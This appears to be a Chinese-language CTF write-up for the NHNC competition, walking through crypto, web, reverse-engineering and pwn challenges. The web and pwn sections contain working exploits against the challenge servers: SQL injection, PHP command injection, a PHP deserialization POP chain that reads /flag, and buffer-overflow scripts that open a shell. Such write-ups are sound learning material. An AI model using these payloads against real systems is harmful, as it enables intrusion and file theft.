Misc#

”A Gift from the Leader Organizer” (1 pt)#

總召大人最帥了😘

NHNC{fishbaby1011sohandsome}

Blog 2 (20 pts)#

出題者: Elliot_404

承上題（Blog 1），這個 Blog 的主人好像洩漏了他不想別讓人知道的東西，請試著找出來

Blog link 在推薦Vtuber文章下的留言區，有neko-2077的留言在他的Disqus留言，有個不要點進來

點進去就可以看到Blog 2了

NHNC{comments_disqusjs}

Blog 3 (50 pts)#

出題者: Elliot_404

承上題（Blog 1），這個 Blog 的主人好像洩漏了他不想讓別人知道的東西，請試著找出來

Blog link

一樣在推薦Vtuber頁面裡，對香香的封面圖右鍵>Open image in new tab

Screenshot 2024-11-18 080214

可以觀察到網址的φ0有點不正常

把後面的照片連結去掉，即可進入Blog 3 Screenshot 2024-11-18 080559

NHNC{image_url}

Where is this (20 pts)#

出題者: Elliot_404

 這在哪裡？

Flag 格式：NHNC{緯度_經度}
（無條件捨去取到小數後三位）

ex:NHNC{12.345_114.514}

附圖連結:https://nhnc.ic3dt3a.org/files/316ada6f8668dc977279ead9ed301fef/OSINT.jpg

線索是點店名:曾家乾麵、河堤上的貓、竹東排骨酥麵

接著在google map上搜尋即可
註:不建議用曾家乾麵搜尋

我用河堤上的貓在google map上搜尋，只找到一個地方，也符合圖片裡⊥的道路結構

右鍵即可看到經緯度資訊

NHNC{24.802_120.979}

NHNC, but C0LoRfUl (39 pts)#

出題者:chilin.h

https://discord.gg/BhrD6sPtNs

Everyone is welcome here!
I felt that the original server was too old-fashioned, so I added a new coloring function!
Whether you are an administrator, a worker, or a participant, you can color your fonts!

歡迎大家來這邊！
我覺得原本的伺服器太古板了，所以新增了上色功能！
無論你是管理員、工人、還是參與者，都可以為你的字體上色！

進入Discord Server，發現我們有管理身分組的權限，直接開好開滿

就可以看到多出現了flag channel

解碼base64即可

NHNC{oI*Y1oxk^@vbXLbxXSQ89N3vsW $zoS5\*QQp5riz^q$ Zj9hMc55X*w3sg6CP10bD6cTadaz2aHVjt0qK#nwdiUDt2#9Dj^*Wo5a9$6LecFD&Ir*ewufJ4LEjk0XUCYTe0}

Forensics#

BotNet1 (60 pts)#

出題者: whale.120

Some bad bots (uhh...maybe contracts) are trading on Sepolia Ethernaut test net, the first bot's address is 0xAD840c4c2F869896EfE0891614faA1908dcD0153, find it's pal's address and wrap it in NHNC{}!

進入Sepolia-etherscan，輸入給定的地址
在Internal Transection中，有一筆合約

NHNC{0x3e9e0e9cee22Ccd0ac94604A72394B0A1CCdb27A}

BotNet2 (80 pts)#

出題者: whale.120

You have discovered the suspicious trade, now find the stacked data on it's pal!

進去看上一題解出來的的地址

進去看這筆交易，選Show more，View input as選UTF-8

NHNC{boti_boti_im_in_ur_wifi}

Crypto#

AES? (20 pts)#

出題者: LemonTea

一段加密的訊息，需要破解加密才能解開。

file link-output.txt output.txt:

Enter IV: 1234567890987654
Secret Key: 1234567890987654
output: TkdU8sqjliuakA+nj2aEmbDf+AaJwASfPuooaKadCqg=

隨便找個AES online decryption，選CBC mode

NHNC{Y0u_kn0w_AES}

Baby RSA (40 pts)#

出題者: whale.120

RSA for babys

file link-chal_17.py

chal_17.py

from Crypto.Util.number import *
from Secret import flag1
primes=[getPrime(512) for _ in range(3)]
p, q, r=primes[0], primes[1], primes[2]
n=p*q*r
e=0x10001
leak=p*q+q*r+r*p-p-q-r
c=pow(bytes_to_long(flag1), e, n)
print(f"{n=}\n{e=}\n{c=}\n{leak=}")

# output
'''
n=1588313940811583670388901008799979643227508347921726508187845925121888018384295030557217724452854073354506733734948963728906121944748626336175026165501032867164031437646285616387352213662865798266568754187475074439344239971434650851017361305440785085800565077621928128381888304170806890898358358161543138717722884498671012157552627202558915649163030193095159221015850832580026640394276672929163085422040567666556330271222397965912435822921196421000606733571473897
e=65537
c=1486820855515154236162411677801199668086445706624424596450332681618232039310031299864777925283743527869824964609902697207891204276017844138716399611186082902687240749084575448807382032315300097699346046330339044585017938639264266759415446628256358731949386881533600592561504081326543143711535184034996293644573109963922652147003096600799028140241574358077390864861527823922494294399292630017130705549749378273155565300089441218224857894833601009764541100666507221
leak=409806027984142046827568136516718279278250684987305418639665531440726724145235686048985209175210488783213754343387799291126405560172391062085673659617777577945402272340754442512900552853645251776025848281268240863874332635558325107405944737687367206917286149877313697949861173539315761823960563606616395256712
'''

整理一下已知資訊:

$n = p \cdot q \cdot r$
$leak = pq + qr + rp - p - q - r$

這樣，我們就可以開始計算 $\varphi (n)$ :

$\varphi (n) = (p - 1) (q - 1) (r - 1)$

展開:

$\varphi (n) = pqr - pq - pr - qr + p + q + r - 1$

n和leak帶入 $\varphi (n)$ 可得:

$\varphi (n)=n - \text{leak} - 1$

exploit:

from Crypto.Util.number import *

n = 1588313940811583670388901008799979643227508347921726508187845925121888018384295030557217724452854073354506733734948963728906121944748626336175026165501032867164031437646285616387352213662865798266568754187475074439344239971434650851017361305440785085800565077621928128381888304170806890898358358161543138717722884498671012157552627202558915649163030193095159221015850832580026640394276672929163085422040567666556330271222397965912435822921196421000606733571473897
e = 65537
c = 1486820855515154236162411677801199668086445706624424596450332681618232039310031299864777925283743527869824964609902697207891204276017844138716399611186082902687240749084575448807382032315300097699346046330339044585017938639264266759415446628256358731949386881533600592561504081326543143711535184034996293644573109963922652147003096600799028140241574358077390864861527823922494294399292630017130705549749378273155565300089441218224857894833601009764541100666507221
leak = 409806027984142046827568136516718279278250684987305418639665531440726724145235686048985209175210488783213754343387799291126405560172391062085673659617777577945402272340754442512900552853645251776025848281268240863874332635558325107405944737687367206917286149877313697949861173539315761823960563606616395256712

phi_n = n - leak - 1
d = inverse(e, phi_n)
m = pow(c, d, n)
flag = long_to_bytes(m)
print(flag)

NHNC{baby_math_won}

Secret ROT13 (40 pts)#

出題者: LemonTea

一段加密的訊息，需要破解加密才能解開。

file link-output.txt file link-source.py source.py:

def encrypt(text, key):
    encrypted_text = ""
    for i, char in enumerate(text):
        offset = ((i + 1 + key) * (i + 1)) % 26 
        if 'A' <= char <= 'Z':
            new_char = chr((ord(char) - ord('A') + offset) % 26 + ord('A'))
        elif 'a' <= char <= 'z':
            new_char = chr((ord(char) - ord('a') + offset) % 26 + ord('a'))
        else:
            new_char = char 
        encrypted_text += new_char
    return encrypted_text

# 測試範例
key = 7
plaintext = "NHNC{TEST}"
ciphertext = encrypt(plaintext, key)
print("加密後的密文:", ciphertext)

output.txt:

VZRU{Y0k_yd0w_Z0o_ti_rsslyxli}

每個字元的加密是基於其位置 i 和給定的密鑰 key $\text{offset} = ((i + 1 + \text{key}) \times (i + 1)) \% 26$

反向操作，把offset減掉，然後還原到對應的ASCII範圍

最後暴力找key

exploit:

def decrypt(encrypted_text, key):
    decrypted_text = ""
    for i, char in enumerate(encrypted_text):
        offset = ((i + 1 + key) * (i + 1)) % 26 
        if 'A' <= char <= 'Z':
            new_char = chr((ord(char) - ord('A') - offset) % 26 + ord('A'))
        elif 'a' <= char <= 'z':
            new_char = chr((ord(char) - ord('a') - offset) % 26 + ord('a'))
        else:
            new_char = char 
        decrypted_text += new_char
    return decrypted_text

for i in range(1, 26):
    print(decrypt("VZRU{Y0k_yd0w_Z0o_ti_rsslyxli}", i))

└─$ python3 epx_rot13.py | grep NHNC
NHNC{Y0u_kn0w_H0w_to_decrypte}

NHNC{Y0u_kn0w_H0w_to_decrypte}

Ande Yo Caliente (60 pts)#

出題者: whale.120

Chacha~

file link

chal.py:

from Crypto.Cipher import ChaCha20
from secret import FLAG
import os
def encrypt(message, key, nonce):
    cipher = ChaCha20.new(key=key, nonce=iv)
    ciphertext = cipher.encrypt(message)
    return ciphertext
message = b'When you feel my heat, look into my eyes\nIt\'s where my demons hide'
key, iv = os.urandom(32), os.urandom(12)
encrypted_message = encrypt(message, key, iv)
encrypted_flag = encrypt(FLAG, key, iv)
data = iv.hex() + '\n' + encrypted_message.hex() + '\n' + encrypted_flag.hex()
f=open("out.txt", "w")
f.write(data)
'''
out.txt:
635b52504ab86d67d780dede
eab3ee7a3821847b76558eb61ec26f4fc7f72f436966ab7680d652b872c85c0bae4879db0748b02dde7df7ca34288a0fa21bd8889c57d3ff986a9566f09733cfbc6e
f393c557632f836f226c828c1e87634489fa2e7d7b38e477b0d14dfa66
'''

這題給了一個明文的message/加密過的message，還有加密過的flag，以及加密兩者的IV(ChaCha20的nonce)

但ChaCha20的加密法是生成一個keystream再XOR

$\text{ciphertext} = \text{keystream} \oplus \text{text}$

所以其實不用IV也沒差?

所以就利用XOR的特性，用給定的明/密文得到keystream

再用keystream解flag

exploit:

from Crypto.Cipher import *
from binascii import *

#iv = unhexlify("635b52504ab86d67d780dede")
encrypted_message = unhexlify("eab3ee7a3821847b76558eb61ec26f4fc7f72f436966ab7680d652b872c85c0bae4879db0748b02dde7df7ca34288a0fa21bd8889c57d3ff986a9566f09733cfbc6e")
encrypted_flag = unhexlify("f393c557632f836f226c828c1e87634489fa2e7d7b38e477b0d14dfa66")

message = b"When you feel my heat, look into my eyes\nIt's where my demons hide"

stream = bytes([m ^ c for m, c in zip(message, encrypted_message)])
flag = bytes([c ^ s for c, s in zip(encrypted_flag, stream)])

print(flag.decode())

NHNC{what_i_learned_from_htb}

Duplicated (255 pts)#

I don't know what to say, just a tricky but kinda easy one.

Do you catch your breath when I look at you?
Are you holding back, like the way I do?
URL: http://23.146.248.134:31337/check

file link

source.py:

from flask import Flask, request, jsonify
import base64
import hashlib

app = Flask(__name__)

def base64_decode(data):
    try:
        return base64.b64decode(data)
    except Exception:
        return None

def validate_pair(data1, data2):
    decoded1 = base64_decode(data1)
    decoded2 = base64_decode(data2)
    
    if decoded1 is None or decoded2 is None:
        return False
    if b"whale_meowing" not in decoded1 or b"whale_meowing" not in decoded2:
        return False

    md5_1 = hashlib.md5(decoded1).hexdigest()
    md5_2 = hashlib.md5(decoded2).hexdigest()
    return md5_1 == md5_2

@app.route('/check', methods=['POST'])
def check():
    try:
        data = request.get_json()

        if not isinstance(data, list) or not all(isinstance(pair, list) and len(pair) == 2 for pair in data):
            return jsonify({"status": "wrong", "error": "Invalid input format"}), 400

        if len(data) != 100:
            return jsonify({"status": "wrong", "error": "Exactly 100 pairs required"}), 400

        all_inputs = [item for pair in data for item in pair]
        if len(all_inputs) != len(set(all_inputs)):
            return jsonify({"status": "wrong", "error": "Duplicate inputs found"}), 400
        
        for pair in data:
            if not validate_pair(pair[0], pair[1]):
                return jsonify({"status": "wrong"}), 200
        
        return jsonify({"status": "NHNC{FAKE_FLAG}"}), 200

    except Exception as e:
        return jsonify({"status": "wrong", "error": str(e)}), 500

if __name__ == '__main__':
    app.run(host="0.0.0.0", port=31337)

他會接收一個長度為100的data

然後data裡面包含一個list，裡面放兩個Base64編碼過的字串

最後做驗證:

沒有重複的Base64字串
Base64解碼後必須包含whale_meowing
List內兩個字串MD5雜湊過必須要一樣

~~然後透過ChatGPT~~，發現Base64有個特性:解碼時會忽略空格、!、-等不支援的字元

稍微實驗一下:

>>> base64.b64decode("YWJj".encode())
b'abc'
>>> base64.b64decode("Y W J j".encode())
b'abc'
>>> base64.b64decode("Y W!Jj".encode())
b'abc'
>>> base64.b64decode("Y!W\nJ\rj".encode())
b'abc'
>>> base64.b64decode("Y!W\nJ~ j_.-".encode())
b'abc'

真的ㄟ，好扯ㄛ

這樣就可以寫exploitㄌ:

import requests
import base64

url = "http://23.146.248.134:31337/check"

def generate_variants(encoded_str, existing_set):
    variants = set()
    for i in range(2):
        new_str = ''
        for c in encoded_str:
            new_str += c 
        if(i==1):
            new_str += ' '
        new_str += ' '
        variants.add(new_str)
        existing_set.add(new_str)
    return list(variants)

data = []
all_inputs_set = set()

for i in range(100):
    content = f"whale_meowing_{i}".encode()
    base_encoded = base64.b64encode(content).decode()
    variants = generate_variants(base_encoded,all_inputs_set)
    data.append(variants)

response = requests.post(url, json=data)
print(response.json())

NHNC{is_md_an_abbreviation_for_maid?}

Web#

哥布林保衞部公告 (30 pts)#

出題者: 哥布林長老-Frank

為保護我哥布林族同胞，本保衛部特出此公告以保護我們免於精靈族的誘惑！
HINT:用Burp suite抓看看嗎 要這麼麻煩嗎

Link:https://nhnc-ctf-frank.dypc.cc/

直接View page source

NHNC{BeCareful!}

EASY METHOD (100 pts)#

I "PUT" something in the website, could u find the "METHOD" to get it?

http://23.146.248.227:60001/

用browser打開

推測應該要用不同的method，結合提敘，推測用PUT

用curl抓下來

└─$ curl -X PUT http://23.146.248.227:60001/
<!DOCTYPE html>
<html lang="en">
<head>
    <meta charset="UTF-8">
    <meta name="viewport" content="width=device-width, initial-scale=1.0">
    <title>HTTP Method Challenge</title>
</head>
<body>
    <h1>這是我的網站</h1>
    <p>來找找看我存在這裡的酷酷資料</p>

    <p><strong>FLAG: NHNC{Y0u_kn0w_H0w_t0_us3_CURL}</strong></p></body>
</html>

NHNC{Y0u_kn0w_H0w_t0_us3_CURL}

I need to get the C00kies (100 pts)#

出題者: LemonTea

I am making a web that can show something but I can't become an admin and get the cookies can you help me?
http://chal.nhnc.ic3dt3a.org:60002/

連進去長這樣:

在Application > Cookies，可以看到目前的role是user:

右鍵Edit Value改admin，Reload Page

NHNC{You_Kn0w_H0w_t0_chang3_th3_c00ki3}

Just login and get the flag

http://chal.nhnc.ic3dt3a.org:60003/

就一個很簡單的Login Page，直覺SQL Injection

當時啥都沒想，隨便構造一個payload: admin' OR 1=1--

…然後就打進去了XDDD

NHNC{S1mp|e_-_SQL!}

1 line php (300 pts)#

1 line >w<b

http://chal.nhnc.ic3dt3a.org:60000
Hint:
Flag is at /

連進去: 一個很簡單的php木馬，但發現前面插了一個註解符號，變成不會執行system()函數

我們可以用換行的方式規避掉

cmd參數用%0Als%20/(%0A是換行的URL編碼): flag的檔案是flag-

payload: http://chal.nhnc.ic3dt3a.org:60000/?cmd=%0A%20cat%20/flag-

NHNC{enter_is_always_the_best}

Democracy (350 pts)#

出題者: Frank

The Republic of Frank National Assembly needs your participation! Head over here

Hint:
FOSS-Its means Open for what?

Link:https://nhnc-ctf-frank2.dypc.cc/

按下我要覆議按鈕，會被rick roll

但看他的跳轉連結，是導向/next

用Burp Suite，攔封包看HTTP History

只專注在/next的response

裡面的內容很多很亂，但最後可以看到:

用Dev mode > Console就可以看到了(記得用burp suite卡著)

NHNC{That’sEasyRight?}

POPcorn (460 pts)#

Do you know what's a POP Chain?
flag is in /flag

http://chal.nhnc.ic3dt3a.org:60008/

點開出現一個輸入框，還有網頁原始碼

題目告訴我們是php反序列化漏洞

只關注php的部分:

<?php
class WHALE{
    public function __construct($name, $report_uri)
    {
        $this->name = $name;
        $this->report_uri = $report_uri;
    }

    public function __get($obj)
    {
        $curl = curl_init();
        curl_setopt($curl, CURLOPT_URL, $this->report_uri);
        curl_setopt($curl, CURLOPT_RETURNTRANSFER, true);
        $response = curl_exec($curl);
        echo $response;
    }

    public function __wakeup()
    {
        echo "NHNC{FAKE_FLAG}";
    }

}

class MEOW{
    public function __construct($cat_struct)
    {
        $this->id = $cat_struct;
        echo $this->id->name;
    }
    public function __toString()
    {
        return     $this->id->r3a1_name;
    }
    public function __sleep()
    {
        return "serialized >w<b, but I want to sleep :zzz:";
    }
}

class TEST{
    public function __construct($note, $url)
    {
        $this->note = $note;
        $this->url = $url;
    }
    public function __destruct()
    {
        if (preg_match('pwned', $this->url))
        {
            system('echo `date` >> log.txt');
        };
    }
}

if (isset($_POST['pop'])){
    unserialize(base64_decode($_POST['pop']));
}
?>

首先要理解php的Magic Method

__wakeup() : object被deserialization時自動調用
__destruct() : object的lifecycle結束(被Destruction)自動調用
__get() : 訪問未定義時自動調用

然後我們會發現:

php腳本結束時，會自動調用TEST::__destruct()

裡面的grep_match('pwned', $this->url)第二個參數應該是string，但$this->url是一個object

這時候就會自動觸發MEOW::__toString()，裡面又訪問了$this->id->r3a1_name

但r3al_name沒被定義，這時候觸發WHALE::__get()(__get(r3al_name))

然後get裡面執行了curl請求

payload目標:__get()請求內的curl(r3al_name)改為curl(file:///flag)

撰寫exploit:

<?php
class WHALE{
    public function __construct($name, $report_uri)
    {
        $this->name = $name;
        $this->report_uri = $report_uri;
    }
}

class MEOW{
    public function __construct($cat_struct)
    {
        $this->id = $cat_struct;
    }
}

class TEST{
    public function __construct($note, $url)
    {
        $this->note = $note;
        $this->url = $url;
    }
} 
$whale = new WHALE('abc', 'file:///flag');
$meow = new MEOW($whale);
$test = new TEST('test', $meow);

$serialized = serialize($test);
$payload = base64_encode($serialized);
echo $payload;
?>

傳送payload:

└─$ curl -X POST -d "pop=Tzo0OiJURVNUIjoyOntzOjQ6Im5vdGUiO3M6NDoidGVzdCI7czozOiJ1cmwiO086NDoiTUVPVyI6MTp7czoyOiJpZCI7Tzo1OiJXSEFMRSI6Mjp7czo0OiJuYW1lIjtzOjM6ImFiYyI7czoxMDoicmVwb3J0X3VyaSI7czoxMjoiZmlsZTovLy9mbGFnIjt9fX0=" http://chal.nhnc.ic3dt3a.org:60008/index.php
NHNC{FAKE_FLAG}NHNC{is_pop_chain_a_kind_of_injection_?_anyway_is_the_best_language_for_hackers}

NHNC{is_pop_chain_a_kind_of_injection_?_anyway_is_the_best_language_for_hackers}

Reverse#

easyyyyyyyyyy (50 pts)#

author: kohiro

No more hint because it is so eazyyyyyyyyy

file link

用radare2分析，afl看到:

0x00401550    1     27 dbg.flag()

VV進去:

NHNC{this_is_a_easy_one}

Guess the num (200 pts)#

出題者：raymond

只有幸運的人才會拿到 flag。不幸運的人啊～今天不是你拿分數的好日子！

file link

這邊用IDA打開

main函式裡:

  srand(0x1234u);
  printf("Lottery! Enter your number: ");
  __isoc99_scanf("%u", &v5);
  v3 = v5 % 0xFF;
  if ( v3 == rand() % 255 )
  {
    printf("You're blessed today! Here's your flag: %s\n", flag);
    puts("Caution ahead! You will be *DISQUALIFIED* if you share the flag; not everyone has the luck you do!");
  }
  else
  {
    puts("You shall not pass! Only those who have luck can get the flag!");
  }

flag是在全域變數，直接點開看是NHNC{as_clear_as_plaintext}

但提交是顯示錯誤，回去看看有那些函式

發現了sub_1217()，裡面有存取到flag讓我很在意:

_BYTE *sub_1217()
{
  __int64 v0; // rax
  _BYTE *result; // rax
  //flag = 'NHNC{as_clear_as_plaintext}'
  v0 = sub_11E9(&flag[0x10000]);
  *(_BYTE *)(v0 + 5) += 19;
  *(_DWORD *)(v0 + 6) -= 117440001;
  *(_WORD *)(v0 + 10) = 24420;
  *(_QWORD *)(v0 + 12) ^= 0x3E0304001D163016uLL;
  *(_DWORD *)(v0 + 20) = 1919906916;
  *(_BYTE *)(v0 + 24) = 125;
  result = (_BYTE *)(v0 + 25);
  *result = 0;
  return result;
}

sub_11E9():

__int64 __fastcall sub_11E9(__int64 a1)
{
  if ( rand() == -70111375 )
    return a1;
  else
    return a1 - 0x10000;
}

仔細分析sub_1217():

flag[0x10000]其實就是flag[0]的地址往後偏移0x10000
rand()會回傳的就只有正數，所以sub_11E9()只會回傳a1 - 0x10000 →v0 = flag[0] 剩下怕會計算錯誤，這邊直接把code轉換成一般的C語言執行:

#include <stdio.h>
#include <stdint.h>
int main() {
    char flag[27] = "NHNC{as_clear_as_plaintext}";
    //sub_1217()
    int64_t v0 = (int64_t)(&flag[0]);

    flag[5] += 19;

    uint32_t *ptr_dword = (uint32_t *)(v0 + 6);
    *ptr_dword -= 117440001;

    uint16_t *ptr_word = (uint16_t *)(v0 + 10);
    *ptr_word = 24420;

    uint64_t *ptr_qword = (uint64_t *)(v0 + 12);
    *ptr_qword ^= 0x3E0304001D163016uLL;

    uint32_t *ptr_dword_2 = (uint32_t *)(v0 + 20);
    *ptr_dword_2 = 1919906916;
    flag[24] = 125;
    flag[25] = '\0';
    printf(flag);
    return 0;
}

NHNC{traced_down_to_dtor}

PWN#

Grading system (100 pts)#

出題者：Raymond

線上評分系統！幫你的學生登記分數的好工具！

nc chal.nhnc.ic3dt3a.org 2003

file link

稍微看一下source code，在switch choice時，有個選項可以開shell:

case 'S':
    if (is_admin) {
        spawn_shell();
        break;
    } else {
        puts("Contact admin if you a bug occurred");
        break;
    }

原本在想要怎麼用buffer overflow蓋掉is_admin，但發現初始值是1234

我:???

所以exploit很簡單:

from pwn import *

r = remote("chal.nhnc.ic3dt3a.org",2003)

r.sendlineafter('Number of students: ',b'114514')
r.sendlineafter('Your choice:',b'S')
r.interactive()
r.close()

$ ls
chal
flag
run.sh
$ cat flag
NHNC{i_dont_think_you_are_a_teacher}
exit

NHNC{i_dont_think_you_are_a_teacher}

DOF (100 pts)#

出題者：whale.120

I've heard that you just learned overflow, show me twice!

nc chal.nhnc.ic3dt3a.org 2000

file link

丟IDA:

int __fastcall main(int argc, const char **argv, const char **envp)
{
  __int64 v3; // rdx
  __int64 v4; // rcx
  __int128 v6; // [rsp+0h] [rbp-30h] BYREF
  char v7[14]; // [rsp+10h] [rbp-20h] BYREF
  __int16 v8; // [rsp+1Eh] [rbp-12h]
  unsigned __int64 v9; // [rsp+28h] [rbp-8h]

  v9 = __readfsqword(0x28u);
  v6 = 0LL;
  strcpy(v7, "cat_say_meow");
  v7[13] = 0;
  v8 = 0;
  setvbuf(stdin, 0LL, 2, 0LL);
  setvbuf(_bss_start, 0LL, 2, 0LL);
  printf("What's you name:");
  ((void (__fastcall *)(__int128 *))gets)(&v6);
  if ( strstr(v7, "cat_sleeping") )
    secret_d00r(v7, "cat_sleeping", v3, v4);
  puts(v7);
  return 0;
}

看到gets()和題敘就可以猜到是buffer overflow了

目前main裡的目標是進入secret_d00r()

所以要想辦法用BOF蓋掉v7

然後我比較喜歡看上面IDA給的註解:

v9 [rbp-8h]
v8 [rbp-12h]
v7 [rbp-20h]

蓋掉v9+v8(0x12)，後面接上cat_sleeping

接著就可以進入secret_d00r:

int secret_d00r()
{
  __int64 v0; // rdx
  __int64 v1; // rcx
  __int64 v2; // r8
  __int64 v3; // r9
  char v5; // [rsp+7h] [rbp-19h]
  FILE *stream; // [rsp+8h] [rbp-18h]
  void *v7; // [rsp+10h] [rbp-10h]
  void *dest; // [rsp+18h] [rbp-8h]

  stream = fopen("flag", "r");
  if ( !stream )
  {
    puts("System Error...:(");
    exit(1);
  }
  v7 = malloc(0x14uLL);
  dest = malloc(0x14uLL);
  if ( !v7 || !dest )
    exit(0);
  memcpy(dest, "whale_meowing", 0xDuLL);
  puts("Welcome to the secret d00r");
  puts("There's a HEAP of broken doors, can you tell it's name?");
  printf("Enter the name: ");
  gets(v7, "whale_meowing", v0, v1, v2, v3);
  if ( strstr((const char *)dest, "pwn3d!!!") )
  {
    while ( 1 )
    {
      v5 = fgetc(stream);
      if ( v5 == -1 )
        break;
      putchar(v5);
    }
  }
  else
  {
    puts(aIThinkYouHaven);
  }
  return fclose(stream);
}

可以看出當dest內含有”pwn3d!!!”字串，就可以看到flag了

值得注意的是，v7和dest在執行時有用malloc()動態分配空間

我因為怕計算錯誤，寫了個C code模擬看到空間計算offset:

#include <stdio.h>
#include <stdlib.h>

int main() {
    void *v7;
    void *dest;

    v7 = malloc(0x14uLL);
    dest = malloc(0x14uLL);

    printf("v7: %p\n", v7);
    printf("dest: %p\n", dest);

    free(v7);
    free(dest);

    return 0;
}

執行結果:

v7: 0xbb32a0
dest: 0xbb32c0

可以算出offset = 0xbb32c0 - 0xbb32a0 = 0x20

我們就可以撰寫exploit:

from pwn import *

#r = process('./chal_23')
r = remote("chal.nhnc.ic3dt3a.org",2000)

r.sendline(b'a'*0x12 + b'cat_sleeping')
r.recvuntil("Enter the name: ")
r.sendline(b'A'*0x20+b'pwn3d!!!')
r.interactive()
r.close()

NHNC{dof==doblue_over_flow?!?!}

Fishbaby’s Library (300 pts)#

出題者: Raymond

Fishbaby 開了一間圖書館，但是把 flag 鎖在圖書館的禁區，你能夠突破防護措施並讀取 flag 嗎？

nc chal.nhnc.ic3dt3a.org 2002

file link source code很長，就不放了

最剛開始時，exploit code有放在給的zip檔內

但他們發現時已經有5個人解了

~~很幸運我在那5個人之中~~

所以我在這邊就講講他的 exploit:

from pwn import *

p = remote('chal.nhnc.ic3dt3a.org', 2002)

p.sendline('S')
p.sendline('.')
p.sendline('R')
p.sendlineafter('Filename? ', '/home/chal/classified/flag')

flag = p.recvline()
log.info(flag)

p.close()

簡單來說，我們要透過read_file來得到flag

選單按L可以看到底下的內容:

Your choice> L
licenses/
rfcs/
classified/
hello_world/
visitor_notice.txt
run.sh
chal
gallery/

然後在source可以看到，R選項是用於read file

並且在S做Set category時對classified有過濾

case 'S':
  printf("Which category interests you? ");

  memset(category, 0x00, sizeof(category));
  scanf(" %[^\n./]", category);

  if (strstr(category, "..") || strstr(category, "/") || strstr(category, "classified")) {
    puts("Hacker!");
    exit(0xdead);
  }

回去看到exploit，輸入順序為:S -> . -> R -> /home/chal/classified/flag

前面S先用.，代表的是當前目錄，用來繞過.. / / / classified

後面R再設定絕對路徑/home/chal/classified/flag

串接後，完整的系統查詢路徑就變成:./home/chal/classified/flag

提交exploit:

NHNC{sneaked_into_forbidden_zone}

Misc#

”A Gift from the Leader Organizer” (1 pt)#

Blog 2 (20 pts)#

Blog 3 (50 pts)#

Where is this (20 pts)#

NHNC, but C0LoRfUl (39 pts)#

Forensics#

BotNet1 (60 pts)#

BotNet2 (80 pts)#

Crypto#

AES? (20 pts)#

Baby RSA (40 pts)#

Secret ROT13 (40 pts)#

Ande Yo Caliente (60 pts)#

Duplicated (255 pts)#

Web#

哥布林保衞部公告 (30 pts)#

EASY METHOD (100 pts)#

I need to get the C00kies (100 pts)#

Login (100 pts)#

1 line php (300 pts)#

Democracy (350 pts)#

POPcorn (460 pts)#

Reverse#

easyyyyyyyyyy (50 pts)#

Guess the num (200 pts)#

PWN#

Grading system (100 pts)#

DOF (100 pts)#

Fishbaby’s Library (300 pts)#